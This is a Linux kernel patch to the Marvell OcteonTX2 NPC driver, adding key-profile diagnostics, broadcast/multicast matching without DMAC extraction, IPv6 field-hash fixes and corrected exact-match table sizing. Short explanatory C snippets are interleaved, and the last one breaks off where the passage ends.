+ 	vlan_tag2 = &key_fields[NPC_VLAN_TAG2];
+ 
+ 	/* if key profile programmed does not extract Ethertype at all */
+-	if (!etype_ether->nr_kws && !etype_tag1->nr_kws && !etype_tag2->nr_kws)
++	if (!etype_ether->nr_kws && !etype_tag1->nr_kws && !etype_tag2->nr_kws) {
++		dev_err(rvu->dev, "mkex: Ethertype is not extracted.\n");
+ 		goto vlan_tci;
++	}
+ 
+ 	/* if key profile programmed extracts Ethertype from one layer */
+ 	if (etype_ether->nr_kws && !etype_tag1->nr_kws && !etype_tag2->nr_kws)
+@@ -354,35 +365,45 @@ static void npc_handle_multi_layer_fields(struct rvu *rvu, int blkaddr, u8 intf)
+ 	/* if key profile programmed extracts Ethertype from multiple layers */
+ 	if (etype_ether->nr_kws && etype_tag1->nr_kws) {
+ 		for (i = 0; i < NPC_MAX_KWS_IN_KEY; i++) {
+-			if (etype_ether->kw_mask[i] != etype_tag1->kw_mask[i])
++			if (etype_ether->kw_mask[i] != etype_tag1->kw_mask[i]) {
++				dev_err(rvu->dev, "mkex: Etype pos is different for untagged and tagged pkts.\n");
+ 				goto vlan_tci;
++			}
+ 		}
+ 		key_fields[NPC_ETYPE] = *etype_tag1;
+ 	}
+ 	if (etype_ether->nr_kws && etype_tag2->nr_kws) {
+ 		for (i = 0; i < NPC_MAX_KWS_IN_KEY; i++) {
+-			if (etype_ether->kw_mask[i] != etype_tag2->kw_mask[i])
++			if (etype_ether->kw_mask[i] != etype_tag2->kw_mask[i]) {
++				dev_err(rvu->dev, "mkex: Etype pos is different for untagged and double tagged pkts.\n");
+ 				goto vlan_tci;
++			}
+ 		}
+ 		key_fields[NPC_ETYPE] = *etype_tag2;
+ 	}
+ 	if (etype_tag1->nr_kws && etype_tag2->nr_kws) {
+ 		for (i = 0; i < NPC_MAX_KWS_IN_KEY; i++) {
+-			if (etype_tag1->kw_mask[i] != etype_tag2->kw_mask[i])
++			if (etype_tag1->kw_mask[i] != etype_tag2->kw_mask[i]) {
++				dev_err(rvu->dev, "mkex: Etype pos is different for tagged and double tagged pkts.\n");
+ 				goto vlan_tci;
++			}
+ 		}
+ 		key_fields[NPC_ETYPE] = *etype_tag2;
+ 	}
+ 
+ 	/* check none of higher layers overwrite Ethertype */
+ 	start_lid = key_fields[NPC_ETYPE].layer_mdata.lid + 1;
+-	if (npc_check_overlap(rvu, blkaddr, NPC_ETYPE, start_lid, intf))
++	if (npc_check_overlap(rvu, blkaddr, NPC_ETYPE, start_lid, intf)) {
++		dev_err(rvu->dev, "mkex: Ethertype is overwritten by higher layers.\n");
+ 		goto vlan_tci;
++	}
+ 	*features |= BIT_ULL(NPC_ETYPE);
+ vlan_tci:
+ 	/* if key profile does not extract outer vlan tci at all */
+-	if (!vlan_tag1->nr_kws && !vlan_tag2->nr_kws)
++	if (!vlan_tag1->nr_kws && !vlan_tag2->nr_kws) {
++		dev_err(rvu->dev, "mkex: Outer vlan tci is not extracted.\n");
+ 		goto done;
++	}
+ 
+ 	/* if key profile extracts outer vlan tci from one layer */
+ 	if (vlan_tag1->nr_kws && !vlan_tag2->nr_kws)
+@@ -393,15 +414,19 @@ vlan_tci:
+ 	/* if key profile extracts outer vlan tci from multiple layers */
+ 	if (vlan_tag1->nr_kws && vlan_tag2->nr_kws) {
+ 		for (i = 0; i < NPC_MAX_KWS_IN_KEY; i++) {
+-			if (vlan_tag1->kw_mask[i] != vlan_tag2->kw_mask[i])
++			if (vlan_tag1->kw_mask[i] != vlan_tag2->kw_mask[i]) {
++				dev_err(rvu->dev, "mkex: Out vlan tci pos is different for tagged and double tagged pkts.\n");
+ 				goto done;
++			}
+ 		}
+ 		key_fields[NPC_OUTER_VID] = *vlan_tag2;
+ 	}
+ 	/* check none of higher layers overwrite outer vlan tci */
+ 	start_lid = key_fields[NPC_OUTER_VID].layer_mdata.lid + 1;
+-	if (npc_check_overlap(rvu, blkaddr, NPC_OUTER_VID, start_lid, intf))
++	if (npc_check_overlap(rvu, blkaddr, NPC_OUTER_VID, start_lid, intf)) {
++		dev_err(rvu->dev, "mkex: Outer vlan tci is overwritten by higher layers.\n");
+ 		goto done;
++	}
+ 	*features |= BIT_ULL(NPC_OUTER_VID);
+ done:
+ 	return;
+@@ -410,6 +435,7 @@ done:
+ static void npc_scan_ldata(struct rvu *rvu, int blkaddr, u8 lid,
+ 			   u8 lt, u64 cfg, u8 intf)
+ {
++	struct npc_mcam_kex_hash *mkex_hash = rvu->kpu.mkex_hash;
+ 	struct npc_mcam *mcam = &rvu->hw->mcam;
+ 	u8 hdr, key, nr_bytes, bit_offset;
+ 	u8 la_ltype, la_start;
+@@ -419,8 +445,6 @@ static void npc_scan_ldata(struct rvu *rvu, int blkaddr, u8 lid,
+ 	nr_bytes = FIELD_GET(NPC_BYTESM, cfg) + 1;
+ 	hdr = FIELD_GET(NPC_HDR_OFFSET, cfg);
+ 	key = FIELD_GET(NPC_KEY_OFFSET, cfg);
+-	start_kwi = key / 8;
+-	offset = (key * 8) % 64;
+ 
+ 	/* For Tx, Layer A has NIX_INST_HDR_S(64 bytes) preceding
+ 	 * ethernet header.
+@@ -435,13 +459,18 @@ static void npc_scan_ldata(struct rvu *rvu, int blkaddr, u8 lid,
+ 
+ #define NPC_SCAN_HDR(name, hlid, hlt, hstart, hlen)			       \
+ do {									       \
++	start_kwi = key / 8;						       \
++	offset = (key * 8) % 64;					       \
+ 	if (lid == (hlid) && lt == (hlt)) {				       \
+ 		if ((hstart) >= hdr &&					       \
+ 		    ((hstart) + (hlen)) <= (hdr + nr_bytes)) {	               \
+ 			bit_offset = (hdr + nr_bytes - (hstart) - (hlen)) * 8; \
+ 			npc_set_layer_mdata(mcam, (name), cfg, lid, lt, intf); \
++			offset += bit_offset;				       \
++			start_kwi += offset / 64;			       \
++			offset %= 64;					       \
+ 			npc_set_kw_masks(mcam, (name), (hlen) * 8,	       \
+-					 start_kwi, offset + bit_offset, intf);\
++					 start_kwi, offset, intf);	       \
+ 		}							       \
+ 	}								       \
+ } while (0)
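
The NPC_SCAN_HDR rework above fixes a carry bug: after bit_offset is added, a field's position can spill past the current 64-bit key word, so the word index (start_kwi) must advance and the offset wrap modulo 64. A standalone check of that arithmetic with illustrative values:

#include <stdio.h>

int main(void)
{
	int key = 7;         /* byte offset of the extraction in the MCAM key */
	int bit_offset = 24; /* field starts 24 bits into that extraction     */

	int start_kwi = key / 8;     /* 64-bit key word index: 0 */
	int offset = (key * 8) % 64; /* bit offset in that word: 56 */

	offset += bit_offset;   /* 80: spills past word 0 */
	start_kwi += offset / 64; /* carry into word 1 */
	offset %= 64;             /* 16 */

	printf("kwi=%d offset=%d\n", start_kwi, offset); /* kwi=1 offset=16 */
	return 0;
}
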
+@@ -453,8 +482,21 @@ do {									       \
+ 	NPC_SCAN_HDR(NPC_TOS, NPC_LID_LC, NPC_LT_LC_IP, 1, 1);
+ 	NPC_SCAN_HDR(NPC_SIP_IPV4, NPC_LID_LC, NPC_LT_LC_IP, 12, 4);
+ 	NPC_SCAN_HDR(NPC_DIP_IPV4, NPC_LID_LC, NPC_LT_LC_IP, 16, 4);
+-	NPC_SCAN_HDR(NPC_SIP_IPV6, NPC_LID_LC, NPC_LT_LC_IP6, 8, 16);
+-	NPC_SCAN_HDR(NPC_DIP_IPV6, NPC_LID_LC, NPC_LT_LC_IP6, 24, 16);
++	if (rvu->hw->cap.npc_hash_extract) {
++		if (mkex_hash->lid_lt_ld_hash_en[intf][lid][lt][0])
++			NPC_SCAN_HDR(NPC_SIP_IPV6, NPC_LID_LC, NPC_LT_LC_IP6, 8, 4);
++		else
++			NPC_SCAN_HDR(NPC_SIP_IPV6, NPC_LID_LC, NPC_LT_LC_IP6, 8, 16);
++
++		if (mkex_hash->lid_lt_ld_hash_en[intf][lid][lt][1])
++			NPC_SCAN_HDR(NPC_DIP_IPV6, NPC_LID_LC, NPC_LT_LC_IP6, 24, 4);
++		else
++			NPC_SCAN_HDR(NPC_DIP_IPV6, NPC_LID_LC, NPC_LT_LC_IP6, 24, 16);
++	} else {
++		NPC_SCAN_HDR(NPC_SIP_IPV6, NPC_LID_LC, NPC_LT_LC_IP6, 8, 16);
++		NPC_SCAN_HDR(NPC_DIP_IPV6, NPC_LID_LC, NPC_LT_LC_IP6, 24, 16);
++	}
++
+ 	NPC_SCAN_HDR(NPC_SPORT_UDP, NPC_LID_LD, NPC_LT_LD_UDP, 0, 2);
+ 	NPC_SCAN_HDR(NPC_DPORT_UDP, NPC_LID_LD, NPC_LT_LD_UDP, 2, 2);
+ 	NPC_SCAN_HDR(NPC_SPORT_TCP, NPC_LID_LD, NPC_LT_LD_TCP, 0, 2);
+@@ -522,6 +564,10 @@ static void npc_set_features(struct rvu *rvu, int blkaddr, u8 intf)
+ 	if (npc_check_field(rvu, blkaddr, NPC_LB, intf))
+ 		*features |= BIT_ULL(NPC_VLAN_ETYPE_CTAG) |
+ 			     BIT_ULL(NPC_VLAN_ETYPE_STAG);
++
++	/* for L2M/L2B/L3M/L3B, check if the type is present in the key */
++	if (npc_check_field(rvu, blkaddr, NPC_LXMB, intf))
++		*features |= BIT_ULL(NPC_LXMB);
+ }
+ 
+ /* Scan key extraction profile and record how fields of our interest
+@@ -553,8 +599,7 @@ static int npc_scan_kex(struct rvu *rvu, int blkaddr, u8 intf)
+ 	 */
+ 	masked_cfg = cfg & NPC_EXACT_NIBBLE;
+ 	bitnr = NPC_EXACT_NIBBLE_START;
+-	for_each_set_bit_from(bitnr, (unsigned long *)&masked_cfg,
+-			      NPC_EXACT_NIBBLE_START) {
++	for_each_set_bit_from(bitnr, (unsigned long *)&masked_cfg, NPC_EXACT_NIBBLE_END + 1) {
+ 		npc_scan_exact_result(mcam, bitnr, key_nibble, intf);
+ 		key_nibble++;
+ 	}
+@@ -599,16 +644,6 @@ static int npc_scan_verify_kex(struct rvu *rvu, int blkaddr)
+ 		dev_err(rvu->dev, "Channel cannot be overwritten\n");
+ 		return -EINVAL;
+ 	}
+-	/* DMAC should be present in key for unicast filter to work */
+-	if (!npc_is_field_present(rvu, NPC_DMAC, NIX_INTF_RX)) {
+-		dev_err(rvu->dev, "DMAC not present in Key\n");
+-		return -EINVAL;
+-	}
+-	/* check that none of the fields overwrite DMAC */
+-	if (npc_check_overlap(rvu, blkaddr, NPC_DMAC, 0, NIX_INTF_RX)) {
+-		dev_err(rvu->dev, "DMAC cannot be overwritten\n");
+-		return -EINVAL;
+-	}
+ 
+ 	npc_set_features(rvu, blkaddr, NIX_INTF_TX);
+ 	npc_set_features(rvu, blkaddr, NIX_INTF_RX);
+@@ -639,9 +674,9 @@ static int npc_check_unsupported_flows(struct rvu *rvu, u64 features, u8 intf)
+ 
+ 	unsupported = (*mcam_features ^ features) & ~(*mcam_features);
+ 	if (unsupported) {
+-		dev_info(rvu->dev, "Unsupported flow(s):\n");
++		dev_warn(rvu->dev, "Unsupported flow(s):\n");
+ 		for_each_set_bit(bit, (unsigned long *)&unsupported, 64)
+-			dev_info(rvu->dev, "%s ", npc_get_field_name(bit));
++			dev_warn(rvu->dev, "%s ", npc_get_field_name(bit));
+ 		return -EOPNOTSUPP;
+ 	}
+ 
+@@ -851,6 +886,11 @@ static void npc_update_flow(struct rvu *rvu, struct mcam_entry *entry,
+ 		npc_update_entry(rvu, NPC_LE, entry, NPC_LT_LE_ESP,
+ 				 0, ~0ULL, 0, intf);
+ 
++	if (features & BIT_ULL(NPC_LXMB)) {
++		output->lxmb = is_broadcast_ether_addr(pkt->dmac) ? 2 : 1;
++		npc_update_entry(rvu, NPC_LXMB, entry, output->lxmb, 0,
++				 output->lxmb, 0, intf);
++	}
+ #define NPC_WRITE_FLOW(field, member, val_lo, val_hi, mask_lo, mask_hi)	      \
+ do {									      \
+ 	if (features & BIT_ULL((field))) {				      \
+@@ -991,8 +1031,20 @@ static void npc_update_rx_entry(struct rvu *rvu, struct rvu_pfvf *pfvf,
+ 	action.match_id = req->match_id;
+ 	action.flow_key_alg = req->flow_key_alg;
+ 
+-	if (req->op == NIX_RX_ACTION_DEFAULT && pfvf->def_ucast_rule)
+-		action = pfvf->def_ucast_rule->rx_action;
++	if (req->op == NIX_RX_ACTION_DEFAULT) {
++		if (pfvf->def_ucast_rule) {
++			action = pfvf->def_ucast_rule->rx_action;
++		} else {
++			/* For profiles which do not extract DMAC, the default
++			 * unicast entry is unused. Hence modify the action for
++			 * requests which use the same action as the default
++			 * unicast entry.
++			 */
++			*(u64 *)&action = 0;
++			action.pf_func = target;
++			action.op = NIX_RX_ACTIONOP_UCAST;
++		}
++	}
+ 
+ 	entry->action = *(u64 *)&action;
+ 
+@@ -1153,6 +1205,7 @@ find_rule:
+ 	rule->chan_mask = write_req.entry_data.kw_mask[0] & NPC_KEX_CHAN_MASK;
+ 	rule->chan = write_req.entry_data.kw[0] & NPC_KEX_CHAN_MASK;
+ 	rule->chan &= rule->chan_mask;
++	rule->lxmb = dummy.lxmb;
+ 	if (is_npc_intf_tx(req->intf))
+ 		rule->intf = pfvf->nix_tx_intf;
+ 	else
+@@ -1215,6 +1268,35 @@ int rvu_mbox_handler_npc_install_flow(struct rvu *rvu,
+ 	if (!is_npc_interface_valid(rvu, req->intf))
+ 		return NPC_FLOW_INTF_INVALID;
+ 
++	/* If DMAC is not extracted in MKEX, rules installed by AF
++	 * can rely on the L2MB bit set by the hardware protocol
++	 * checker for broadcast and multicast addresses.
++	 */
++	if (npc_check_field(rvu, blkaddr, NPC_DMAC, req->intf))
++		goto process_flow;
++
++	if (is_pffunc_af(req->hdr.pcifunc) &&
++	    req->features & BIT_ULL(NPC_DMAC)) {
++		if (is_unicast_ether_addr(req->packet.dmac)) {
++			dev_warn(rvu->dev,
++				 "%s: mkex profile does not support ucast flow\n",
++				 __func__);
++			return NPC_FLOW_NOT_SUPPORTED;
++		}
++
++		if (!npc_is_field_present(rvu, NPC_LXMB, req->intf)) {
++			dev_warn(rvu->dev,
++				 "%s: mkex profile does not support bcast/mcast flow",
++				 __func__);
++			return NPC_FLOW_NOT_SUPPORTED;
++		}
++
++		/* Modify feature to use LXMB instead of DMAC */
++		req->features &= ~BIT_ULL(NPC_DMAC);
++		req->features |= BIT_ULL(NPC_LXMB);
++	}
++
++process_flow:
+ 	if (from_vf && req->default_rule)
+ 		return NPC_FLOW_VF_PERM_DENIED;
+ 
+@@ -1558,3 +1640,22 @@ int npc_install_mcam_drop_rule(struct rvu *rvu, int mcam_idx, u16 *counter_idx,
+ 
+ 	return 0;
+ }
++
++int rvu_mbox_handler_npc_get_field_status(struct rvu *rvu,
++					  struct npc_get_field_status_req *req,
++					  struct npc_get_field_status_rsp *rsp)
++{
++	int blkaddr;
++
++	blkaddr = rvu_get_blkaddr(rvu, BLKTYPE_NPC, 0);
++	if (blkaddr < 0)
++		return NPC_MCAM_INVALID_REQ;
++
++	if (!is_npc_interface_valid(rvu, req->intf))
++		return NPC_FLOW_INTF_INVALID;
++
++	if (npc_check_field(rvu, blkaddr, req->field, req->intf))
++		rsp->enable = 1;
++
++	return 0;
++}
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_fs.h b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_fs.h
+index bdd65ce56a32d..3f5c9042d10e7 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_fs.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_fs.h
+@@ -9,6 +9,10 @@
+ #define __RVU_NPC_FS_H
+ 
+ #define IPV6_WORDS	4
++#define NPC_BYTESM	GENMASK_ULL(19, 16)
++#define NPC_HDR_OFFSET	GENMASK_ULL(15, 8)
++#define NPC_KEY_OFFSET	GENMASK_ULL(5, 0)
++#define NPC_LDATA_EN	BIT_ULL(7)
+ 
+ void npc_update_entry(struct rvu *rvu, enum key_fields type,
+ 		      struct mcam_entry *entry, u64 val_lo,
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.c
+index 594029007f85d..3182adb7b9a80 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.c
+@@ -78,42 +78,43 @@ static u32 rvu_npc_toeplitz_hash(const u64 *data, u64 *key, size_t data_bit_len,
+ 	return hash_out;
+ }
+ 
+-u32 npc_field_hash_calc(u64 *ldata, struct npc_mcam_kex_hash *mkex_hash,
+-			u64 *secret_key, u8 intf, u8 hash_idx)
++u32 npc_field_hash_calc(u64 *ldata, struct npc_get_field_hash_info_rsp rsp,
++			u8 intf, u8 hash_idx)
+ {
+ 	u64 hash_key[3];
+ 	u64 data_padded[2];
+ 	u32 field_hash;
+ 
+-	hash_key[0] = secret_key[1] << 31;
+-	hash_key[0] |= secret_key[2];
+-	hash_key[1] = secret_key[1] >> 33;
+-	hash_key[1] |= secret_key[0] << 31;
+-	hash_key[2] = secret_key[0] >> 33;
++	hash_key[0] = rsp.secret_key[1] << 31;
++	hash_key[0] |= rsp.secret_key[2];
++	hash_key[1] = rsp.secret_key[1] >> 33;
++	hash_key[1] |= rsp.secret_key[0] << 31;
++	hash_key[2] = rsp.secret_key[0] >> 33;
+ 
+-	data_padded[0] = mkex_hash->hash_mask[intf][hash_idx][0] & ldata[0];
+-	data_padded[1] = mkex_hash->hash_mask[intf][hash_idx][1] & ldata[1];
++	data_padded[0] = rsp.hash_mask[intf][hash_idx][0] & ldata[0];
++	data_padded[1] = rsp.hash_mask[intf][hash_idx][1] & ldata[1];
+ 	field_hash = rvu_npc_toeplitz_hash(data_padded, hash_key, 128, 159);
+ 
+-	field_hash &= mkex_hash->hash_ctrl[intf][hash_idx] >> 32;
+-	field_hash |= mkex_hash->hash_ctrl[intf][hash_idx];
++	field_hash &= FIELD_GET(GENMASK(63, 32), rsp.hash_ctrl[intf][hash_idx]);
++	field_hash += FIELD_GET(GENMASK(31, 0), rsp.hash_ctrl[intf][hash_idx]);
+ 	return field_hash;
+ }
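
npc_field_hash_calc() above also changes how the per-LD hash-ctrl register is applied: its upper 32 bits mask the Toeplitz result and its lower 32 bits are now added as an offset (the old code OR-ed them). A minimal userspace sketch with a made-up register value:

#include <stdint.h>
#include <stdio.h>

int main(void)
{
	uint64_t hash_ctrl = 0x0000ffff00000010ull; /* mask=0xffff, offset=0x10 */
	uint32_t field_hash = 0xdeadbeef;           /* raw 32-bit hash result   */

	field_hash &= (uint32_t)(hash_ctrl >> 32); /* keep masked bits: 0xbeef */
	field_hash += (uint32_t)hash_ctrl;         /* add offset: 0xbeff       */

	printf("field_hash = 0x%x\n", field_hash);
	return 0;
}
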
+ 
+-static u64 npc_update_use_hash(int lt, int ld)
++static u64 npc_update_use_hash(struct rvu *rvu, int blkaddr,
++			       u8 intf, int lid, int lt, int ld)
+ {
+-	u64 cfg = 0;
+-
+-	switch (lt) {
+-	case NPC_LT_LC_IP6:
+-		/* Update use_hash(bit-20) and bytesm1 (bit-16:19)
+-		 * in KEX_LD_CFG
+-		 */
+-		cfg = KEX_LD_CFG_USE_HASH(0x1, 0x03,
+-					  ld ? 0x8 : 0x18,
+-					  0x1, 0x0, 0x10);
+-		break;
+-	}
++	u8 hdr, key;
++	u64 cfg;
++
++	cfg = rvu_read64(rvu, blkaddr, NPC_AF_INTFX_LIDX_LTX_LDX_CFG(intf, lid, lt, ld));
++	hdr = FIELD_GET(NPC_HDR_OFFSET, cfg);
++	key = FIELD_GET(NPC_KEY_OFFSET, cfg);
++
++	/* Update use_hash(bit-20) to 'true' and
++	 * bytesm1(bit-16:19) to '0x3' in KEX_LD_CFG
++	 */
++	cfg = KEX_LD_CFG_USE_HASH(0x1, 0x03,
++				  hdr, 0x1, 0x0, key);
+ 
+ 	return cfg;
+ }
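
The reworked npc_update_use_hash() above stops hard-coding header and key offsets: it re-reads the live KEX_LD_CFG, keeps hdr and key, and only sets use_hash (bit 20, per the comment) with bytesm1 = 0x3 so a 4-byte hash replaces the 16-byte IPv6 field. A sketch of that field surgery using the NPC_BYTESM/NPC_HDR_OFFSET/NPC_KEY_OFFSET layout from rvu_npc_fs.h; the sample cfg is invented:

#include <stdint.h>
#include <stdio.h>

#define NPC_BYTESM_MASK 0xf0000ull    /* bits 19:16, bytes-minus-1 */
#define NPC_HDR_MASK    0xff00ull     /* bits 15:8, header offset  */
#define NPC_KEY_MASK    0x3full       /* bits 5:0, key offset      */
#define NPC_USE_HASH    (1ull << 20)  /* per the comment above     */

int main(void)
{
	/* invented cfg: extract 16 bytes at header offset 8 into key 0x10 */
	uint64_t cfg = (15ull << 16) | (8ull << 8) | (1ull << 7) | 0x10;

	uint64_t hdr = (cfg & NPC_HDR_MASK) >> 8;
	uint64_t key = cfg & NPC_KEY_MASK;

	cfg &= ~NPC_BYTESM_MASK;              /* drop the old length      */
	cfg |= NPC_USE_HASH | (0x3ull << 16); /* hashed, 4-byte field     */

	printf("hdr=%llu key=%llu cfg=0x%llx\n",
	       (unsigned long long)hdr, (unsigned long long)key,
	       (unsigned long long)cfg);
	return 0;
}
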
+@@ -132,12 +133,13 @@ static void npc_program_mkex_hash_rx(struct rvu *rvu, int blkaddr,
+ 		for (lt = 0; lt < NPC_MAX_LT; lt++) {
+ 			for (ld = 0; ld < NPC_MAX_LD; ld++) {
+ 				if (mkex_hash->lid_lt_ld_hash_en[intf][lid][lt][ld]) {
+-					u64 cfg = npc_update_use_hash(lt, ld);
++					u64 cfg;
+ 
+-					hash_cnt++;
+ 					if (hash_cnt == NPC_MAX_HASH)
+ 						return;
+ 
++					cfg = npc_update_use_hash(rvu, blkaddr,
++								  intf, lid, lt, ld);
+ 					/* Set updated KEX configuration */
+ 					SET_KEX_LD(intf, lid, lt, ld, cfg);
+ 					/* Set HASH configuration */
+@@ -149,6 +151,8 @@ static void npc_program_mkex_hash_rx(struct rvu *rvu, int blkaddr,
+ 							     mkex_hash->hash_mask[intf][ld][1]);
+ 					SET_KEX_LD_HASH_CTRL(intf, ld,
+ 							     mkex_hash->hash_ctrl[intf][ld]);
++
++					hash_cnt++;
+ 				}
+ 			}
+ 		}
+@@ -169,12 +173,13 @@ static void npc_program_mkex_hash_tx(struct rvu *rvu, int blkaddr,
+ 		for (lt = 0; lt < NPC_MAX_LT; lt++) {
+ 			for (ld = 0; ld < NPC_MAX_LD; ld++)
+ 				if (mkex_hash->lid_lt_ld_hash_en[intf][lid][lt][ld]) {
+-					u64 cfg = npc_update_use_hash(lt, ld);
++					u64 cfg;
+ 
+-					hash_cnt++;
+ 					if (hash_cnt == NPC_MAX_HASH)
+ 						return;
+ 
++					cfg = npc_update_use_hash(rvu, blkaddr,
++								  intf, lid, lt, ld);
+ 					/* Set updated KEX configuration */
+ 					SET_KEX_LD(intf, lid, lt, ld, cfg);
+ 					/* Set HASH configuration */
+@@ -187,8 +192,6 @@ static void npc_program_mkex_hash_tx(struct rvu *rvu, int blkaddr,
+ 					SET_KEX_LD_HASH_CTRL(intf, ld,
+ 							     mkex_hash->hash_ctrl[intf][ld]);
+ 					hash_cnt++;
+-					if (hash_cnt == NPC_MAX_HASH)
+-						return;
+ 				}
+ 		}
+ 	}
+@@ -242,8 +245,8 @@ void npc_update_field_hash(struct rvu *rvu, u8 intf,
+ 			   struct flow_msg *omask)
+ {
+ 	struct npc_mcam_kex_hash *mkex_hash = rvu->kpu.mkex_hash;
+-	struct npc_get_secret_key_req req;
+-	struct npc_get_secret_key_rsp rsp;
++	struct npc_get_field_hash_info_req req;
++	struct npc_get_field_hash_info_rsp rsp;
+ 	u64 ldata[2], cfg;
+ 	u32 field_hash;
+ 	u8 hash_idx;
+@@ -254,7 +257,7 @@ void npc_update_field_hash(struct rvu *rvu, u8 intf,
+ 	}
+ 
+ 	req.intf = intf;
+-	rvu_mbox_handler_npc_get_secret_key(rvu, &req, &rsp);
++	rvu_mbox_handler_npc_get_field_hash_info(rvu, &req, &rsp);
+ 
+ 	for (hash_idx = 0; hash_idx < NPC_MAX_HASH; hash_idx++) {
+ 		cfg = rvu_read64(rvu, blkaddr, NPC_AF_INTFX_HASHX_CFG(intf, hash_idx));
+@@ -270,44 +273,45 @@ void npc_update_field_hash(struct rvu *rvu, u8 intf,
+ 				 * is hashed to 32 bit value.
+ 				 */
+ 				case NPC_LT_LC_IP6:
+-					if (features & BIT_ULL(NPC_SIP_IPV6)) {
++					/* ld[0] == hash_idx[0] == Source IPv6
++					 * ld[1] == hash_idx[1] == Destination IPv6
++					 */
++					if ((features & BIT_ULL(NPC_SIP_IPV6)) && !hash_idx) {
+ 						u32 src_ip[IPV6_WORDS];
+ 
+ 						be32_to_cpu_array(src_ip, pkt->ip6src, IPV6_WORDS);
+-						ldata[0] = (u64)src_ip[0] << 32 | src_ip[1];
+-						ldata[1] = (u64)src_ip[2] << 32 | src_ip[3];
++						ldata[1] = (u64)src_ip[0] << 32 | src_ip[1];
++						ldata[0] = (u64)src_ip[2] << 32 | src_ip[3];
+ 						field_hash = npc_field_hash_calc(ldata,
+-										 mkex_hash,
+-										 rsp.secret_key,
++										 rsp,
+ 										 intf,
+ 										 hash_idx);
+ 						npc_update_entry(rvu, NPC_SIP_IPV6, entry,
+-								 field_hash, 0, 32, 0, intf);
++								 field_hash, 0,
++								 GENMASK(31, 0), 0, intf);
+ 						memcpy(&opkt->ip6src, &pkt->ip6src,
+ 						       sizeof(pkt->ip6src));
+ 						memcpy(&omask->ip6src, &mask->ip6src,
+ 						       sizeof(mask->ip6src));
+-						break;
+-					}
+-
+-					if (features & BIT_ULL(NPC_DIP_IPV6)) {
++					} else if ((features & BIT_ULL(NPC_DIP_IPV6)) && hash_idx) {
+ 						u32 dst_ip[IPV6_WORDS];
+ 
+ 						be32_to_cpu_array(dst_ip, pkt->ip6dst, IPV6_WORDS);
+-						ldata[0] = (u64)dst_ip[0] << 32 | dst_ip[1];
+-						ldata[1] = (u64)dst_ip[2] << 32 | dst_ip[3];
++						ldata[1] = (u64)dst_ip[0] << 32 | dst_ip[1];
++						ldata[0] = (u64)dst_ip[2] << 32 | dst_ip[3];
+ 						field_hash = npc_field_hash_calc(ldata,
+-										 mkex_hash,
+-										 rsp.secret_key,
++										 rsp,
+ 										 intf,
+ 										 hash_idx);
+ 						npc_update_entry(rvu, NPC_DIP_IPV6, entry,
+-								 field_hash, 0, 32, 0, intf);
++								 field_hash, 0,
++								 GENMASK(31, 0), 0, intf);
+ 						memcpy(&opkt->ip6dst, &pkt->ip6dst,
+ 						       sizeof(pkt->ip6dst));
+ 						memcpy(&omask->ip6dst, &mask->ip6dst,
+ 						       sizeof(mask->ip6dst));
+ 					}
++
+ 					break;
+ 				}
+ 			}
+@@ -315,13 +319,13 @@ void npc_update_field_hash(struct rvu *rvu, u8 intf,
+ 	}
+ }
+ 
+-int rvu_mbox_handler_npc_get_secret_key(struct rvu *rvu,
+-					struct npc_get_secret_key_req *req,
+-					struct npc_get_secret_key_rsp *rsp)
++int rvu_mbox_handler_npc_get_field_hash_info(struct rvu *rvu,
++					     struct npc_get_field_hash_info_req *req,
++					     struct npc_get_field_hash_info_rsp *rsp)
+ {
+ 	u64 *secret_key = rsp->secret_key;
+ 	u8 intf = req->intf;
+-	int blkaddr;
++	int i, j, blkaddr;
+ 
+ 	blkaddr = rvu_get_blkaddr(rvu, BLKTYPE_NPC, 0);
+ 	if (blkaddr < 0) {
+@@ -333,6 +337,19 @@ int rvu_mbox_handler_npc_get_secret_key(struct rvu *rvu,
+ 	secret_key[1] = rvu_read64(rvu, blkaddr, NPC_AF_INTFX_SECRET_KEY1(intf));
+ 	secret_key[2] = rvu_read64(rvu, blkaddr, NPC_AF_INTFX_SECRET_KEY2(intf));
+ 
++	for (i = 0; i < NPC_MAX_HASH; i++) {
++		for (j = 0; j < NPC_MAX_HASH_MASK; j++) {
++			rsp->hash_mask[NIX_INTF_RX][i][j] =
++				GET_KEX_LD_HASH_MASK(NIX_INTF_RX, i, j);
++			rsp->hash_mask[NIX_INTF_TX][i][j] =
++				GET_KEX_LD_HASH_MASK(NIX_INTF_TX, i, j);
++		}
++	}
++
++	for (i = 0; i < NPC_MAX_INTF; i++)
++		for (j = 0; j < NPC_MAX_HASH; j++)
++			rsp->hash_ctrl[i][j] = GET_KEX_LD_HASH_CTRL(i, j);
++
+ 	return 0;
+ }
+ 
+@@ -1879,9 +1896,9 @@ int rvu_npc_exact_init(struct rvu *rvu)
+ 	rvu->hw->table = table;
+ 
+ 	/* Read table size, ways and depth */
+-	table->mem_table.depth = FIELD_GET(GENMASK_ULL(31, 24), npc_const3);
+ 	table->mem_table.ways = FIELD_GET(GENMASK_ULL(19, 16), npc_const3);
+-	table->cam_table.depth = FIELD_GET(GENMASK_ULL(15, 0), npc_const3);
++	table->mem_table.depth = FIELD_GET(GENMASK_ULL(15, 0), npc_const3);
++	table->cam_table.depth = FIELD_GET(GENMASK_ULL(31, 24), npc_const3);
+ 
+ 	dev_dbg(rvu->dev, "%s: NPC exact match 4way_2k table(ways=%d, depth=%d)\n",
+ 		__func__,  table->mem_table.ways, table->cam_table.depth);
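
The swap above matters because the three sizes occupy different ranges of NPC_AF_CONST3: ways in bits 19:16, mem-table depth in bits 15:0, cam-table depth in bits 31:24. A userspace FIELD_GET emulation with an example encoding:

#include <stdint.h>
#include <stdio.h>

/* userspace stand-in for the kernel's FIELD_GET() */
static uint64_t field_get(uint64_t mask, uint64_t val)
{
	return (val & mask) >> __builtin_ctzll(mask);
}

int main(void)
{
	/* example encoding: ways=4, mem depth=0x8000, cam depth=0x1c */
	uint64_t npc_const3 = 0x1c048000ull;

	printf("ways=%llu mem=0x%llx cam=0x%llx\n",
	       (unsigned long long)field_get(0xf0000ull, npc_const3),
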